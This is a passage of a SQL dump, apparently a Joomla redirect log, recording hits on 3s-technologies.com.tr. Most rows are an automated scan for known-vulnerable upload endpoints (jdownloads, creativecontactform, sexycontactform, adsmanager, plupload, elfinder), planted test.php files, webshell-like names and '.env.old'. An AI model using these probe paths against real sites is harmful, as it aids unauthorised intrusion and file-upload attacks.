00:00:00',301),(31209,'http://3s-technologies.com.tr/tr/uvuveve.php',NULL,'','',1,0,'2022-12-01 11:51:02','0000-00-00 00:00:00',301),(31210,'http://3s-technologies.com.tr/tr/xv.php',NULL,'','',38,0,'2022-12-01 11:51:02','0000-00-00 00:00:00',301),(31211,'http://3s-technologies.com.tr/tr/nin.php',NULL,'','',1,0,'2022-12-01 11:51:03','0000-00-00 00:00:00',301),(31212,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder/php/connector.php',NULL,'','',5,0,'2022-12-02 06:26:11','0000-00-00 00:00:00',301),(31213,'https://3s-technologies.com.tr/en/github.com/joomla',NULL,'','',10,0,'2022-12-03 11:45:51','0000-00-00 00:00:00',301),(31214,'http://3s-technologies.com.tr/tr/iis-85.png',NULL,'http://3s-technologies.com.tr/iis-85.png','',3,0,'2022-12-04 03:05:44','0000-00-00 00:00:00',301),(31215,'http://3s-technologies.com.tr/en/.env.old',NULL,'','',3,0,'2022-12-04 13:10:11','0000-00-00 00:00:00',301),(31216,'https://3s-technologies.com.tr/about.php',NULL,'','',6,0,'2022-12-08 05:28:47','0000-00-00 00:00:00',301),(31217,'https://www.3s-technologies.com.tr/tr/images/test.php.gif',NULL,'','',1,0,'2022-12-08 11:54:42','0000-00-00 00:00:00',301),(31218,'https://www.3s-technologies.com.tr/images/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:54:43','0000-00-00 00:00:00',301),(31219,'https://www.3s-technologies.com.tr/tr/images/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:54:44','0000-00-00 00:00:00',301),(31220,'https://www.3s-technologies.com.tr/images/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:54:44','0000-00-00 00:00:00',301),(31221,'https://www.3s-technologies.com.tr/tr/images/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:54:45','0000-00-00 00:00:00',301),(31222,'https://www.3s-technologies.com.tr/images/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:54:46','0000-00-00 00:00:00',301),(31223,'https://www.3s-technologies.com.tr/tr/images/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:54:47','0000-00-00 00:00:00',301),(31224,'https://www.3s-technologies.com.tr/images/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:54:48','0000-00-00 00:00:00',301),(31225,'https://www.3s-technologies.com.tr/tr/images/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:54:49','0000-00-00 00:00:00',301),(31226,'http://www.3s-technologies.com.tr/tr/images/test.php.gif',NULL,'','',1,0,'2022-12-08 11:54:50','0000-00-00 00:00:00',301),(31227,'http://www.3s-technologies.com.tr/images/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:54:50','0000-00-00 00:00:00',301),(31228,'https://www.3s-technologies.com.tr/tr/images/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:54:50','0000-00-00 00:00:00',301),(31229,'http://www.3s-technologies.com.tr/tr/images/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:54:51','0000-00-00 00:00:00',301),(31230,'http://www.3s-technologies.com.tr/images/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:54:51','0000-00-00 00:00:00',301),(31231,'http://www.3s-technologies.com.tr/tr/images/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:54:52','0000-00-00 00:00:00',301),(31232,'http://www.3s-technologies.com.tr/images/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:54:52','0000-00-00 00:00:00',301),(31233,'http://www.3s-technologies.com.tr/tr/images/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:54:52','0000-00-00 00:00:00',301),(31234,'http://www.3s-technologies.com.tr/images/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:54:53','0000-00-00 00:00:00',301),(31235,'http://www.3s-technologies.com.tr/tr/images/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:54:53','0000-00-00 00:00:00',301),(31236,'http://www.3s-technologies.com.tr/tr/images/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:54:54','0000-00-00 00:00:00',301),(31237,'https://www.3s-technologies.com.tr/tr/stories/test.php.gif',NULL,'','',1,0,'2022-12-08 11:54:55','0000-00-00 00:00:00',301),(31238,'https://www.3s-technologies.com.tr/stories/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:54:55','0000-00-00 00:00:00',301),(31239,'https://www.3s-technologies.com.tr/tr/stories/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:54:56','0000-00-00 00:00:00',301),(31240,'https://www.3s-technologies.com.tr/stories/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:54:57','0000-00-00 00:00:00',301),(31241,'https://www.3s-technologies.com.tr/tr/stories/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:54:57','0000-00-00 00:00:00',301),(31242,'https://www.3s-technologies.com.tr/stories/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:54:58','0000-00-00 00:00:00',301),(31243,'https://www.3s-technologies.com.tr/tr/stories/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:54:59','0000-00-00 00:00:00',301),(31244,'https://www.3s-technologies.com.tr/stories/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:55:00','0000-00-00 00:00:00',301),(31245,'https://www.3s-technologies.com.tr/tr/stories/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:55:01','0000-00-00 00:00:00',301),(31246,'https://www.3s-technologies.com.tr/tr/stories/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:55:03','0000-00-00 00:00:00',301),(31247,'http://www.3s-technologies.com.tr/tr/stories/test.php.gif',NULL,'','',1,0,'2022-12-08 11:55:03','0000-00-00 00:00:00',301),(31248,'http://www.3s-technologies.com.tr/stories/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:55:04','0000-00-00 00:00:00',301),(31249,'http://www.3s-technologies.com.tr/tr/stories/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:55:04','0000-00-00 00:00:00',301),(31250,'http://www.3s-technologies.com.tr/stories/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:04','0000-00-00 00:00:00',301),(31251,'http://www.3s-technologies.com.tr/tr/stories/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:05','0000-00-00 00:00:00',301),(31252,'http://www.3s-technologies.com.tr/stories/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:05','0000-00-00 00:00:00',301),(31253,'http://www.3s-technologies.com.tr/tr/stories/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:06','0000-00-00 00:00:00',301),(31254,'http://www.3s-technologies.com.tr/stories/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:55:06','0000-00-00 00:00:00',301),(31255,'http://www.3s-technologies.com.tr/tr/stories/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:55:07','0000-00-00 00:00:00',301),(31256,'http://www.3s-technologies.com.tr/tr/stories/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:55:08','0000-00-00 00:00:00',301),(31257,'https://www.3s-technologies.com.tr/tr/virtuemart/test.php.gif',NULL,'','',1,0,'2022-12-08 11:55:08','0000-00-00 00:00:00',301),(31258,'https://www.3s-technologies.com.tr/virtuemart/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:55:09','0000-00-00 00:00:00',301),(31259,'https://www.3s-technologies.com.tr/tr/virtuemart/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:55:10','0000-00-00 00:00:00',301),(31260,'https://www.3s-technologies.com.tr/virtuemart/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:10','0000-00-00 00:00:00',301),(31261,'https://www.3s-technologies.com.tr/tr/virtuemart/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:11','0000-00-00 00:00:00',301),(31262,'https://www.3s-technologies.com.tr/virtuemart/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:11','0000-00-00 00:00:00',301),(31263,'https://www.3s-technologies.com.tr/tr/virtuemart/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:13','0000-00-00 00:00:00',301),(31264,'https://www.3s-technologies.com.tr/virtuemart/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:55:14','0000-00-00 00:00:00',301),(31265,'https://www.3s-technologies.com.tr/tr/virtuemart/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:55:15','0000-00-00 00:00:00',301),(31266,'http://www.3s-technologies.com.tr/tr/virtuemart/test.php.gif',NULL,'','',1,0,'2022-12-08 11:55:15','0000-00-00 00:00:00',301),(31267,'https://www.3s-technologies.com.tr/tr/virtuemart/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:55:16','0000-00-00 00:00:00',301),(31268,'http://www.3s-technologies.com.tr/virtuemart/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:55:16','0000-00-00 00:00:00',301),(31269,'http://www.3s-technologies.com.tr/tr/virtuemart/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:55:16','0000-00-00 00:00:00',301),(31270,'http://www.3s-technologies.com.tr/virtuemart/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:17','0000-00-00 00:00:00',301),(31271,'http://www.3s-technologies.com.tr/tr/virtuemart/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:17','0000-00-00 00:00:00',301),(31272,'http://www.3s-technologies.com.tr/virtuemart/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:17','0000-00-00 00:00:00',301),(31273,'http://www.3s-technologies.com.tr/tr/virtuemart/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:18','0000-00-00 00:00:00',301),(31274,'http://www.3s-technologies.com.tr/virtuemart/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:55:18','0000-00-00 00:00:00',301),(31275,'http://www.3s-technologies.com.tr/tr/virtuemart/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:55:18','0000-00-00 00:00:00',301),(31276,'http://www.3s-technologies.com.tr/tr/virtuemart/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:55:19','0000-00-00 00:00:00',301),(31277,'https://www.3s-technologies.com.tr/tr/product/test.php.gif',NULL,'','',1,0,'2022-12-08 11:55:20','0000-00-00 00:00:00',301),(31278,'https://www.3s-technologies.com.tr/product/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:55:20','0000-00-00 00:00:00',301),(31279,'https://www.3s-technologies.com.tr/tr/product/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:55:21','0000-00-00 00:00:00',301),(31280,'https://www.3s-technologies.com.tr/product/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:22','0000-00-00 00:00:00',301),(31281,'https://www.3s-technologies.com.tr/tr/product/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:23','0000-00-00 00:00:00',301),(31282,'https://www.3s-technologies.com.tr/product/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:24','0000-00-00 00:00:00',301),(31283,'https://www.3s-technologies.com.tr/tr/product/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:24','0000-00-00 00:00:00',301),(31284,'https://www.3s-technologies.com.tr/product/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:55:25','0000-00-00 00:00:00',301),(31285,'https://www.3s-technologies.com.tr/tr/product/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:55:25','0000-00-00 00:00:00',301),(31286,'http://www.3s-technologies.com.tr/tr/product/test.php.gif',NULL,'','',1,0,'2022-12-08 11:55:27','0000-00-00 00:00:00',301),(31287,'https://www.3s-technologies.com.tr/tr/product/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:55:27','0000-00-00 00:00:00',301),(31288,'http://www.3s-technologies.com.tr/product/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:55:27','0000-00-00 00:00:00',301),(31289,'http://www.3s-technologies.com.tr/tr/product/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:55:27','0000-00-00 00:00:00',301),(31290,'http://www.3s-technologies.com.tr/product/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:28','0000-00-00 00:00:00',301),(31291,'http://www.3s-technologies.com.tr/tr/product/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:28','0000-00-00 00:00:00',301),(31292,'http://www.3s-technologies.com.tr/product/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:28','0000-00-00 00:00:00',301),(31293,'http://www.3s-technologies.com.tr/tr/product/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:29','0000-00-00 00:00:00',301),(31294,'http://www.3s-technologies.com.tr/product/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:55:29','0000-00-00 00:00:00',301),(31295,'http://www.3s-technologies.com.tr/tr/product/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:55:30','0000-00-00 00:00:00',301),(31296,'http://www.3s-technologies.com.tr/tr/product/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:55:30','0000-00-00 00:00:00',301),(31297,'https://3s-technologies.com.tr/tr/images/test.php.gif',NULL,'','',2,0,'2022-12-08 11:55:43','0000-00-00 00:00:00',301),(31298,'https://3s-technologies.com.tr/images/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:55:44','0000-00-00 00:00:00',301),(31299,'https://3s-technologies.com.tr/tr/images/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:55:44','0000-00-00 00:00:00',301),(31300,'https://3s-technologies.com.tr/images/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:45','0000-00-00 00:00:00',301),(31301,'https://3s-technologies.com.tr/tr/images/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:46','0000-00-00 00:00:00',301),(31302,'https://3s-technologies.com.tr/images/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:46','0000-00-00 00:00:00',301),(31303,'https://3s-technologies.com.tr/tr/images/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:47','0000-00-00 00:00:00',301),(31304,'https://3s-technologies.com.tr/images/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:55:47','0000-00-00 00:00:00',301),(31305,'https://3s-technologies.com.tr/tr/images/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:55:48','0000-00-00 00:00:00',301),(31306,'http://3s-technologies.com.tr/tr/images/test.php.gif',NULL,'','',1,0,'2022-12-08 11:55:49','0000-00-00 00:00:00',301),(31307,'https://3s-technologies.com.tr/tr/images/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:55:49','0000-00-00 00:00:00',301),(31308,'http://3s-technologies.com.tr/images/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:55:49','0000-00-00 00:00:00',301),(31309,'http://3s-technologies.com.tr/tr/images/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:55:49','0000-00-00 00:00:00',301),(31310,'http://3s-technologies.com.tr/images/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:50','0000-00-00 00:00:00',301),(31311,'http://3s-technologies.com.tr/tr/images/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:50','0000-00-00 00:00:00',301),(31312,'http://3s-technologies.com.tr/images/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:50','0000-00-00 00:00:00',301),(31313,'http://3s-technologies.com.tr/tr/images/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:51','0000-00-00 00:00:00',301),(31314,'http://3s-technologies.com.tr/images/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:55:51','0000-00-00 00:00:00',301),(31315,'http://3s-technologies.com.tr/tr/images/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:55:52','0000-00-00 00:00:00',301),(31316,'http://3s-technologies.com.tr/tr/images/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:55:52','0000-00-00 00:00:00',301),(31317,'https://3s-technologies.com.tr/tr/stories/test.php.gif',NULL,'','',1,0,'2022-12-08 11:55:53','0000-00-00 00:00:00',301),(31318,'https://3s-technologies.com.tr/stories/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:55:53','0000-00-00 00:00:00',301),(31319,'https://3s-technologies.com.tr/tr/stories/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:55:54','0000-00-00 00:00:00',301),(31320,'https://3s-technologies.com.tr/stories/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:55','0000-00-00 00:00:00',301),(31321,'https://3s-technologies.com.tr/tr/stories/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:56','0000-00-00 00:00:00',301),(31322,'https://3s-technologies.com.tr/stories/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:55:56','0000-00-00 00:00:00',301),(31323,'https://3s-technologies.com.tr/tr/stories/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:55:57','0000-00-00 00:00:00',301),(31324,'https://3s-technologies.com.tr/stories/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:55:57','0000-00-00 00:00:00',301),(31325,'https://3s-technologies.com.tr/tr/stories/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:55:58','0000-00-00 00:00:00',301),(31326,'http://3s-technologies.com.tr/tr/stories/test.php.gif',NULL,'','',1,0,'2022-12-08 11:55:59','0000-00-00 00:00:00',301),(31327,'https://3s-technologies.com.tr/tr/stories/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:55:59','0000-00-00 00:00:00',301),(31328,'http://3s-technologies.com.tr/stories/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:55:59','0000-00-00 00:00:00',301),(31329,'http://3s-technologies.com.tr/tr/stories/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:55:59','0000-00-00 00:00:00',301),(31330,'http://3s-technologies.com.tr/stories/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:56:00','0000-00-00 00:00:00',301),(31331,'http://3s-technologies.com.tr/tr/stories/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:56:00','0000-00-00 00:00:00',301),(31332,'http://3s-technologies.com.tr/stories/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:56:00','0000-00-00 00:00:00',301),(31333,'http://3s-technologies.com.tr/tr/stories/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:56:01','0000-00-00 00:00:00',301),(31334,'http://3s-technologies.com.tr/stories/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:56:01','0000-00-00 00:00:00',301),(31335,'http://3s-technologies.com.tr/tr/stories/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:56:02','0000-00-00 00:00:00',301),(31336,'http://3s-technologies.com.tr/tr/stories/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:56:02','0000-00-00 00:00:00',301),(31337,'https://3s-technologies.com.tr/tr/virtuemart/test.php.gif',NULL,'','',1,0,'2022-12-08 11:56:03','0000-00-00 00:00:00',301),(31338,'https://3s-technologies.com.tr/virtuemart/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:56:03','0000-00-00 00:00:00',301),(31339,'https://3s-technologies.com.tr/tr/virtuemart/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:56:04','0000-00-00 00:00:00',301),(31340,'https://3s-technologies.com.tr/virtuemart/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:56:04','0000-00-00 00:00:00',301),(31341,'https://3s-technologies.com.tr/tr/virtuemart/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:56:05','0000-00-00 00:00:00',301),(31342,'https://3s-technologies.com.tr/virtuemart/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:56:06','0000-00-00 00:00:00',301),(31343,'https://3s-technologies.com.tr/tr/virtuemart/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:56:07','0000-00-00 00:00:00',301),(31344,'https://3s-technologies.com.tr/virtuemart/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:56:07','0000-00-00 00:00:00',301),(31345,'https://3s-technologies.com.tr/tr/virtuemart/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:56:08','0000-00-00 00:00:00',301),(31346,'http://3s-technologies.com.tr/tr/virtuemart/test.php.gif',NULL,'','',1,0,'2022-12-08 11:56:09','0000-00-00 00:00:00',301),(31347,'https://3s-technologies.com.tr/tr/virtuemart/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:56:09','0000-00-00 00:00:00',301),(31348,'http://3s-technologies.com.tr/virtuemart/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:56:09','0000-00-00 00:00:00',301),(31349,'http://3s-technologies.com.tr/tr/virtuemart/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:56:09','0000-00-00 00:00:00',301),(31350,'http://3s-technologies.com.tr/virtuemart/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:56:10','0000-00-00 00:00:00',301),(31351,'http://3s-technologies.com.tr/tr/virtuemart/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:56:10','0000-00-00 00:00:00',301),(31352,'http://3s-technologies.com.tr/virtuemart/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:56:10','0000-00-00 00:00:00',301),(31353,'http://3s-technologies.com.tr/tr/virtuemart/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:56:11','0000-00-00 00:00:00',301),(31354,'http://3s-technologies.com.tr/virtuemart/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:56:11','0000-00-00 00:00:00',301),(31355,'http://3s-technologies.com.tr/tr/virtuemart/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:56:12','0000-00-00 00:00:00',301),(31356,'http://3s-technologies.com.tr/tr/virtuemart/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:56:12','0000-00-00 00:00:00',301),(31357,'https://3s-technologies.com.tr/tr/product/test.php.gif',NULL,'','',1,0,'2022-12-08 11:56:13','0000-00-00 00:00:00',301),(31358,'https://3s-technologies.com.tr/product/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:56:14','0000-00-00 00:00:00',301),(31359,'https://3s-technologies.com.tr/tr/product/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:56:15','0000-00-00 00:00:00',301),(31360,'https://3s-technologies.com.tr/product/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:56:15','0000-00-00 00:00:00',301),(31361,'https://3s-technologies.com.tr/tr/product/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:56:16','0000-00-00 00:00:00',301),(31362,'https://3s-technologies.com.tr/product/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:56:16','0000-00-00 00:00:00',301),(31363,'https://3s-technologies.com.tr/tr/product/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:56:17','0000-00-00 00:00:00',301),(31364,'https://3s-technologies.com.tr/product/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:56:17','0000-00-00 00:00:00',301),(31365,'https://3s-technologies.com.tr/tr/product/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:56:18','0000-00-00 00:00:00',301),(31366,'http://3s-technologies.com.tr/tr/product/test.php.gif',NULL,'','',1,0,'2022-12-08 11:56:19','0000-00-00 00:00:00',301),(31367,'https://3s-technologies.com.tr/tr/product/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:56:19','0000-00-00 00:00:00',301),(31368,'http://3s-technologies.com.tr/product/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2022-12-08 11:56:19','0000-00-00 00:00:00',301),(31369,'http://3s-technologies.com.tr/tr/product/images/jdownloads/screenshots/test.php.j',NULL,'','',1,0,'2022-12-08 11:56:21','0000-00-00 00:00:00',301),(31370,'http://3s-technologies.com.tr/product/components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:56:21','0000-00-00 00:00:00',301),(31371,'http://3s-technologies.com.tr/tr/product/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:56:21','0000-00-00 00:00:00',301),(31372,'http://3s-technologies.com.tr/product/components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2022-12-08 11:56:22','0000-00-00 00:00:00',301),(31373,'http://3s-technologies.com.tr/tr/product/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',1,0,'2022-12-08 11:56:22','0000-00-00 00:00:00',301),(31374,'http://3s-technologies.com.tr/product/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2022-12-08 11:56:23','0000-00-00 00:00:00',301),(31375,'http://3s-technologies.com.tr/tr/product/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',1,0,'2022-12-08 11:56:23','0000-00-00 00:00:00',301),(31376,'http://3s-technologies.com.tr/tr/product/tmp/plupload/test.php',NULL,'','',1,0,'2022-12-08 11:56:24','0000-00-00 00:00:00',301),(31377,'http://3s-technologies.com.tr/en/contacts/trackback',NULL,'http://arabfm.net/vb/showthread.php?p=3065452#post3065452','',4,0,'2022-12-08 21:46:03','0000-00-00 00:00:00',301),(31378,'https://3s-technologies.com.tr/tr/wood-processing-ahåÿap-iåÿleme',NULL,'','',7,0,'2022-12-08 21:46:16','0000-00-00 00:00:00',301),(31379,'https://3s-technologies.com.tr/tr/using-joomla/extensions/templates/atomic/home-page-atomic/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'https://3s-technologies.com.tr/tr/using-joomla/extensions/templates/atomic/home-page-atomic','',8,0,'2022-12-10 11:30:01','0000-00-00 00:00:00',301),(31380,'http://3s-technologies.com.tr/en/wp-content/languages',NULL,'','',54,0,'2022-12-11 10:07:17','0000-00-00 00:00:00',301),(31381,'https://3s-technologies.com.tr/tr/index.php/component/users/?view=registration',NULL,'https://3s-technologies.com.tr/tr//index.php/component/users/?view=registration','',1,0,'2022-12-12 03:19:35','0000-00-00 00:00:00',301),(31382,'http://3s-technologies.com.tr/en/wp-content/themes',NULL,'','',83,0,'2022-12-12 04:50:43','0000-00-00 00:00:00',301),(31383,'http://3s-technologies.com.tr/en/wp-content/plugins',NULL,'','',52,0,'2022-12-12 23:21:07','0000-00-00 00:00:00',301),(31384,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kaz%c4%b1ma-milling&sa=u&ved=2ahukewjg-bfivfx7ahuol0qihucybygqfnoeccoqag&usg=aovvaw2wqrll1fpq47ac81o4xdym',NULL,'','',2,0,'2022-12-13 02:50:50','0000-00-00 